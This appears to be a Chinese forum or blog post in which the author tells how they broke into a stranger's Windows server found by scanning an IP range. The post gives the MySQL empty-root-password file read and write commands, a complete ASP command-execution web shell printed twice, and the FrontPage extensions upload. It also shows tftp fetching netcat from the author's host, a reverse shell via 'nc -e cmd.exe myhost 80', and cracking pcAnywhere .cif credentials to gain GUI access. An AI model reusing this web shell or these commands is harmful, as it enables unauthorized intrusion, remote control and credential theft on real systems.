以前只在网上看到过介绍,想不到无意中被我碰上了。事因我很少使用扫描的,所以遇到的漏洞不多。这次刚好心血来潮扫了一个C段,就被我碰上了。
是windows主机,但是安装了mysql,X-Scan报告了一些信息,其中有两个引起了我的注意。
一种是mysql的root密码为空,一种是frontpage的extention漏洞。
1、对于mysql中root密码为空:
使用mysql的连接器连接上对方的mysql server,
使用
load data infile "c://boot.ini" into table tmp;
select * from tmp
呵呵,可以看到boot.ini的内容,那可以确认两件事,1是这是个windows系统,2是load data工作正常
之后是写入asp木马
执行:
use test
create table tmp(str TEXT)
insert into tmp values ('<%@codepage=936%>')
insert into tmp values ('<%')
insert into tmp values ('On Error Resume Next ')
insert into tmp values ('if Request("ad")<>"" then response.status="401 not Authorized" ')
insert into tmp values ('Set z=Server.CreateObject("WSCRIPT.SHELL") ')
insert into tmp values ('T=Server.mappath("lp"&year(date)&Session.SessionID&".txt") ')
insert into tmp values ('sz=Request("Ck") ')
insert into tmp values ('If sz=""Then sz="set"')
insert into tmp values ('z.Run "%COMSPEC% /c^"&sz&">"&T,0,True')
insert into tmp values ('Response.Write "<FORM method=POST><input type=text name=Ck value=''"&sz&"''> <input type=submit value=Run> <input type=reset value=RESET> <input type=submit name=ad title=PasswordWantted value=RunAsAdmin></FORM><br>执行了["&sz&"] {临时文件}["&T&"]<Iframe src=''lp"&year(date)&Session.SessionID&".txt'' width=99% height=99% frameborder=0></iframe>"')
insert into tmp values ('response.flush')
insert into tmp values ('for i=1 to 1800000')
insert into tmp values ('ys=9+9')
insert into tmp values ('next')
insert into tmp values ('z.run "%COMSPEC% /c echo Y│del "&T,1,True')
insert into tmp values ('set z=Nothing%>')
下面写入硬盘中
select * from cmd into outfile "c://inetput//wwwroot/iis7.asp";
写入成功,(注意,之前写入过别的asp木马,结果被查杀了,结果郁闷了好一阵,以为是写入失败了呢,但后来尝试写入一个测试的asp,只有一句话 <% response.write "test" %>,结果是发现可以执行的,由此可知应该是被杀毒软件查杀了。但上面的木马没有被查杀。(最起码没有被norton查杀)
输入http://ip/iis7.asp可以看到木马并执行命令。
2、看到还有frontpage extention漏洞,我还没有试过呢,所以决定一试,上网查了下资料,发现利用起来超简单。
运行frontpage,“文件”-->“打开站点”,输入http://ip,一阵等待后,远程的整个站点内容出来了,可以直接编辑,甚至写木马,这次够简单了!!于是直接把上面的木马写进去。
<%@codepage=936%>
<%
On Error Resume Next
'if Request("ad")<>"" then response.status="401 not Authorized"
Set z=Server.CreateObject("WSCRIPT.SHELL")
T=Server.mappath("lp"&year(date)&Session.SessionID&".txt")
sz=Request("Ck")
If sz=""Then sz="set"
z.Run "%COMSPEC% /c^"&sz&">"&T,0,True
Response.Write "<FORM method=POST><input type=text name=Ck value='"&sz&"'> <input type=submit value=Run> <input type=reset value=RESET> <input type=submit name=ad title=PasswordWantted value=RunAsAdmin></FORM><br>执行了["&sz&"] {临时文件}["&T&"]<Iframe src='lp"&year(date)&Session.SessionID&".txt' width=99% height=99% frameborder=0></iframe>"
response.flush
for i=1 to 1800000
ys=9+9
next
z.run "%COMSPEC% /c echo Y│del "&T,1,True
set z=Nothing%>
直接浏览木马,执行命令net start和netstat -ano ,看看有什么东西,再查看一下各个盘的内容。
收获有二, servU 6.0.0.2和pcanywhere。
对pcanywhere 不熟悉,所以一开始相用servU 6.0.0.2的本地溢出漏洞,(反正我们有个web shell了),但是要怎么传送溢出程序上去呢?因为对方机上是安装了norton的,(刚好我机上也装了),所以知道norton对nc.exe是不杀的,但是对溢出程序是杀的,但现在是web权限,没有办法停止norton来传送溢出文件,我又不会开免杀,看着web shell 执行起来有点麻烦,所以顺便传个nc上去,但是在web shell里运行了tftp -i myhost get nc.exe 后,本机的tftp服务器半天没有反应,怀疑是权限不够,但是我知道inetpub/wwwroot 下我刚才是可以写东西进去的,所以tftp -i myhost get nc.exe c:/inetpub/wwwroot/nc.exe,结果还是没有见到反应,郁闷!
于是想着修改ServUDaemon.ini,先把对方机器上的servU文件夹下的ini复制到c:/inetpub/wwwroot下,用IE下载了,在本地里添加了个拥有各种权限的用户,然后在自己的ServUDaemon.ini里面找到相关的密码和权限设置内容,添加到下载回来的ServUDaemon.ini里面,先改名为ServUDaemon1.ini,然后用frontpage写上去。在web shell 里面运行copy c:/inetpub/wwwroot/ServUDaemon1.ini "C:/program files/ServU/ServUDaemon1.ini",结果运行不成功,看来是权限不够,写不了文件进去,那就就是没有办法修改ServUDaemon.ini的内容了。
这条路不通,只好走pcanywhere了,dir /s *.cif,找到两个pcanywhere 的cif文件,下载回来,使用PcAnyWhereCrack.exe,一下子就得出了密码,机上没安装pcanywhere,只好到网上找。但这时又有个意外发现——我的tftp服务程序上居然有反应了,说是下载了nc.exe,晕死,现在才有反应过来,到对方机上dir了一下,果然下载了nc.exe ,于是试了下nc -e cmd.exe myhost 80 (怕有防火墙,所以选择了80端口,一般都是开的了),这边果然得到一个shell连接了。这样操作起来就舒服多了,可惜的是这时我们已经不需要了。
直接使用pcanywhere连接对方ip,填入刚才得到的用户名和密码(中间又出了点意外,第一个cif得到的用户名和密码居然是连接不进去的,试了几次都不行,累我以为又要失败了,后来用第二个cif得出的用户名和密码,结果成功了),出现了gui界面。看了下里面的内容,有几个虚拟主机的网页在里面,这台机器应该是一个做视频会议软件的公司的。我一向都没有破坏的习惯,只是刚体验了下这两个我以前没有碰到过的内容,呵呵,收工走人。
利用这两个漏洞中任何一个都可以得到webshell,如果有空的话解一下servU的密码应该也可以得到几个站点的管理密码了。不过我没有兴趣来爆破。利用pcanywhere的密码文件是很容易得到密码的(我之前一直也以为是使用暴破的,现在才知道不是,因为一下子就出来密码了,应该是通过算法可逆出来的)
可见这东西是不可靠的(虽然用起来是很方便,可以直接远程操纵和文件传输),只要有办法得到cif文件就可以得到远程连接权限了。
758
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
